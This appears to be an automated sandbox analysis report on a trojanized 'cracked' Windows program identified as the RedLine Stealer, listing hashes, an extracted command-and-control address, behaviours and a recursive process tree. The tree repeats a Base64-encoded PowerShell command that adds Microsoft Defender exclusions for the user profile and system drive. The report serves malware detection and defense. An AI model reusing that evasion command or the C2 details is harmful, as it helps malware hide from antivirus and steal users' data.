Analysis
-
max time kernel
232s -
max time network
1723s -
platform
windows11-21h2_x64 -
resource
win11-20241023-en -
resource tags
arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-11-2024 16:15
Static task
static1
Behavioral task
behavioral1
Sample
RogueV6.3cracked.exe
Resource
win11-20241023-en
General
-
Target
RogueV6.3cracked.exe
-
Size
13.6MB
-
MD5
ed475b5614b57bb769d9475bab408bb2
-
SHA1
a4496180da8930ea4b50f6b7e08e48cf4d093a43
-
SHA256
d4bae32272d4b78710e2546c787a5301135cdc3bbc89dde41fc32b5ff1b1374b
-
SHA512
88842132f2a486a34b4766d4b0092856fc3313895612f8aa613914acb5d32114ee033744c473b9ab28ec5f9f3e6e31980c85139f9f7dafdc4614b67f496403ce
-
SSDEEP
196608:/Qx1aFKgrjL4HwYJTPV+abRdGHMICWi0fNkn6zTetKvIy5nQmy:/Y1EDjL4QYJTQabRdGHvCWi0l6O+Kw
Malware Config
Extracted
redline
NOu
135.236.153.9:1912
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/files/0x001c00000002aaa7-4.dat family_redline behavioral1/memory/2972-12-0x0000000000510000-0x0000000000562000-memory.dmp family_redline -
Redline family
-
Executes dropped EXE 64 IoCs
pid Process 2972 build (4).exe 3692 build (4).exe 4956 build (4).exe 2576 build (4).exe 4452 build (4).exe 1972 build (4).exe 4756 build (4).exe 2672 build (4).exe 2740 build (4).exe 4996 build (4).exe 1912 build (4).exe 1852 build (4).exe 1188 build (4).exe 4392 build (4).exe 664 build (4).exe 5284 build (4).exe 5540 build (4).exe 5772 build (4).exe 6096 build (4).exe 5068 build (4).exe 4864 build (4).exe 5948 build (4).exe 1628 build (4).exe 5552 build (4).exe 3008 build (4).exe 5168 build (4).exe 3020 build (4).exe 784 build (4).exe 6216 build (4).exe 6512 build (4).exe 6720 build (4).exe 6960 build (4).exe 7136 build (4).exe 6156 build (4).exe 6624 build (4).exe 3684 build (4).exe 6668 build (4).exe 7000 build (4).exe 6684 build (4).exe 3852 build (4).exe 1416 build (4).exe 1600 build (4).exe 7064 build (4).exe 4380 build (4).exe 6020 build (4).exe 4720 build (4).exe 5644 build (4).exe 6032 build (4).exe 4044 build (4).exe 2636 build (4).exe 1868 build (4).exe 5968 build (4).exe 1076 build (4).exe 1992 build (4).exe 5064 build (4).exe 6588 build (4).exe 5460 build (4).exe 3656 build (4).exe 6284 build (4).exe 6880 build (4).exe 3832 build (4).exe 7160 build (4).exe 1104 build (4).exe 3764 build (4).exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 14536 17148 Process not Found 2699 17400 16760 Process not Found 2703 8420 12112 Process not Found 2492 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language build (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RogueV6.3cracked.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2528 powershell.exe 5020 powershell.exe 2528 powershell.exe 2724 powershell.exe 5020 powershell.exe 1456 powershell.exe 2724 powershell.exe 720 powershell.exe 2412 powershell.exe 1456 powershell.exe 4892 powershell.exe 4892 powershell.exe 720 powershell.exe 720 powershell.exe 2412 powershell.exe 2412 powershell.exe 3304 powershell.exe 3304 powershell.exe 1796 powershell.exe 1796 powershell.exe 4892 powershell.exe 2108 powershell.exe 2108 powershell.exe 3304 powershell.exe 4644 powershell.exe 4644 powershell.exe 1796 powershell.exe 2008 powershell.exe 2008 powershell.exe 2108 powershell.exe 3328 powershell.exe 3328 powershell.exe 4644 powershell.exe 4768 powershell.exe 4768 powershell.exe 2008 powershell.exe 4952 powershell.exe 4952 powershell.exe 3328 powershell.exe 5276 powershell.exe 5276 powershell.exe 4768 powershell.exe 5532 powershell.exe 5532 powershell.exe 4952 powershell.exe 5764 powershell.exe 5764 powershell.exe 5276 powershell.exe 6088 powershell.exe 6088 powershell.exe 5532 powershell.exe 5324 powershell.exe 5324 powershell.exe 5764 powershell.exe 1792 powershell.exe 1792 powershell.exe 6088 powershell.exe 5572 powershell.exe 5572 powershell.exe 5324 powershell.exe 5196 powershell.exe 5196 powershell.exe 1792 powershell.exe 5572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeDebugPrivilege 720 powershell.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeDebugPrivilege 3304 powershell.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeDebugPrivilege 2108 powershell.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 3328 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeDebugPrivilege 5276 powershell.exe Token: SeDebugPrivilege 5532 powershell.exe Token: SeDebugPrivilege 5764 powershell.exe Token: SeDebugPrivilege 6088 powershell.exe Token: SeDebugPrivilege 5324 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeDebugPrivilege 5572 powershell.exe Token: SeDebugPrivilege 5196 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 5160 powershell.exe Token: SeDebugPrivilege 920 powershell.exe Token: SeDebugPrivilege 6196 powershell.exe Token: SeDebugPrivilege 6488 powershell.exe Token: SeDebugPrivilege 6712 powershell.exe Token: SeDebugPrivilege 6948 powershell.exe Token: SeDebugPrivilege 7128 powershell.exe Token: SeDebugPrivilege 6152 powershell.exe Token: SeDebugPrivilege 6620 powershell.exe Token: SeDebugPrivilege 5892 powershell.exe Token: SeDebugPrivilege 7096 powershell.exe Token: SeDebugPrivilege 7080 powershell.exe Token: SeDebugPrivilege 5656 powershell.exe Token: SeDebugPrivilege 4284 powershell.exe Token: SeDebugPrivilege 1596 powershell.exe Token: SeDebugPrivilege 5568 powershell.exe Token: SeDebugPrivilege 4212 powershell.exe Token: SeDebugPrivilege 956 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 3636 powershell.exe Token: SeDebugPrivilege 5292 powershell.exe Token: SeDebugPrivilege 5752 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 6080 powershell.exe Token: SeDebugPrivilege 6928 powershell.exe Token: SeDebugPrivilege 5132 powershell.exe Token: SeDebugPrivilege 2288 powershell.exe Token: SeDebugPrivilege 3368 powershell.exe Token: SeDebugPrivilege 1596 powershell.exe Token: SeDebugPrivilege 6856 powershell.exe Token: SeDebugPrivilege 1512 powershell.exe Token: SeDebugPrivilege 6072 powershell.exe Token: SeDebugPrivilege 6660 powershell.exe Token: SeDebugPrivilege 3780 powershell.exe Token: SeDebugPrivilege 5832 powershell.exe Token: SeDebugPrivilege 5332 powershell.exe Token: SeDebugPrivilege 6656 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2480 wrote to memory of 2528 2480 RogueV6.3cracked.exe 79 PID 2480 wrote to memory of 2528 2480 RogueV6.3cracked.exe 79 PID 2480 wrote to memory of 2528 2480 RogueV6.3cracked.exe 79 PID 2480 wrote to memory of 2972 2480 RogueV6.3cracked.exe 81 PID 2480 wrote to memory of 2972 2480 RogueV6.3cracked.exe 81 PID 2480 wrote to memory of 2972 2480 RogueV6.3cracked.exe 81 PID 2480 wrote to memory of 984 2480 RogueV6.3cracked.exe 82 PID 2480 wrote to memory of 984 2480 RogueV6.3cracked.exe 82 PID 2480 wrote to memory of 984 2480 RogueV6.3cracked.exe 82 PID 984 wrote to memory of 5020 984 RogueV6.3cracked.exe 83 PID 984 wrote to memory of 5020 984 RogueV6.3cracked.exe 83 PID 984 wrote to memory of 5020 984 RogueV6.3cracked.exe 83 PID 984 wrote to memory of 3692 984 RogueV6.3cracked.exe 84 PID 984 wrote to memory of 3692 984 RogueV6.3cracked.exe 84 PID 984 wrote to memory of 3692 984 RogueV6.3cracked.exe 84 PID 984 wrote to memory of 1388 984 RogueV6.3cracked.exe 86 PID 984 wrote to memory of 1388 984 RogueV6.3cracked.exe 86 PID 984 wrote to memory of 1388 984 RogueV6.3cracked.exe 86 PID 1388 wrote to memory of 2724 1388 RogueV6.3cracked.exe 87 PID 1388 wrote to memory of 2724 1388 RogueV6.3cracked.exe 87 PID 1388 wrote to memory of 2724 1388 RogueV6.3cracked.exe 87 PID 1388 wrote to memory of 4956 1388 RogueV6.3cracked.exe 89 PID 1388 wrote to memory of 4956 1388 RogueV6.3cracked.exe 89 PID 1388 wrote to memory of 4956 1388 RogueV6.3cracked.exe 89 PID 1388 wrote to memory of 1572 1388 RogueV6.3cracked.exe 90 PID 1388 wrote to memory of 1572 1388 RogueV6.3cracked.exe 90 PID 1388 wrote to memory of 1572 1388 RogueV6.3cracked.exe 90 PID 1572 wrote to memory of 1456 1572 RogueV6.3cracked.exe 481 PID 1572 wrote to memory of 1456 1572 RogueV6.3cracked.exe 481 PID 1572 wrote to memory of 1456 1572 RogueV6.3cracked.exe 481 PID 1572 wrote to memory of 2576 1572 RogueV6.3cracked.exe 92 PID 1572 wrote to memory of 2576 1572 RogueV6.3cracked.exe 92 PID 1572 wrote to memory of 2576 1572 RogueV6.3cracked.exe 92 PID 1572 wrote to memory of 1812 1572 RogueV6.3cracked.exe 118 PID 1572 wrote to memory of 1812 1572 RogueV6.3cracked.exe 118 PID 1572 wrote to memory of 1812 1572 RogueV6.3cracked.exe 118 PID 1812 wrote to memory of 720 1812 RogueV6.3cracked.exe 95 PID 1812 wrote to memory of 720 1812 RogueV6.3cracked.exe 95 PID 1812 wrote to memory of 720 1812 RogueV6.3cracked.exe 95 PID 1812 wrote to memory of 4452 1812 RogueV6.3cracked.exe 96 PID 1812 wrote to memory of 4452 1812 RogueV6.3cracked.exe 96 PID 1812 wrote to memory of 4452 1812 RogueV6.3cracked.exe 96 PID 1812 wrote to memory of 3460 1812 RogueV6.3cracked.exe 98 PID 1812 wrote to memory of 3460 1812 RogueV6.3cracked.exe 98 PID 1812 wrote to memory of 3460 1812 RogueV6.3cracked.exe 98 PID 3460 wrote to memory of 2412 3460 RogueV6.3cracked.exe 99 PID 3460 wrote to memory of 2412 3460 RogueV6.3cracked.exe 99 PID 3460 wrote to memory of 2412 3460 RogueV6.3cracked.exe 99 PID 3460 wrote to memory of 1972 3460 RogueV6.3cracked.exe 100 PID 3460 wrote to memory of 1972 3460 RogueV6.3cracked.exe 100 PID 3460 wrote to memory of 1972 3460 RogueV6.3cracked.exe 100 PID 3460 wrote to memory of 3004 3460 RogueV6.3cracked.exe 101 PID 3460 wrote to memory of 3004 3460 RogueV6.3cracked.exe 101 PID 3460 wrote to memory of 3004 3460 RogueV6.3cracked.exe 101 PID 3004 wrote to memory of 4892 3004 RogueV6.3cracked.exe 103 PID 3004 wrote to memory of 4892 3004 RogueV6.3cracked.exe 103 PID 3004 wrote to memory of 4892 3004 RogueV6.3cracked.exe 103 PID 3004 wrote to memory of 4756 3004 RogueV6.3cracked.exe 104 PID 3004 wrote to memory of 4756 3004 RogueV6.3cracked.exe 104 PID 3004 wrote to memory of 4756 3004 RogueV6.3cracked.exe 104 PID 3004 wrote to memory of 2148 3004 RogueV6.3cracked.exe 106 PID 3004 wrote to memory of 2148 3004 RogueV6.3cracked.exe 106 PID 3004 wrote to memory of 2148 3004 RogueV6.3cracked.exe 106 PID 2148 wrote to memory of 3304 2148 RogueV6.3cracked.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"2⤵
- Executes dropped EXE
PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"3⤵
- Executes dropped EXE
PID:3692
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"4⤵
- Executes dropped EXE
PID:4956
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"5⤵
- Executes dropped EXE
PID:2576
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:720
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"6⤵
- Executes dropped EXE
PID:4452
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"7⤵
- Executes dropped EXE
PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"7⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"8⤵
- Executes dropped EXE
PID:4756
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"9⤵
- Executes dropped EXE
PID:2672
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"9⤵
- System Location Discovery: System Language Discovery
PID:3604 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"10⤵
- Executes dropped EXE
PID:2740
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"10⤵PID:3768
-
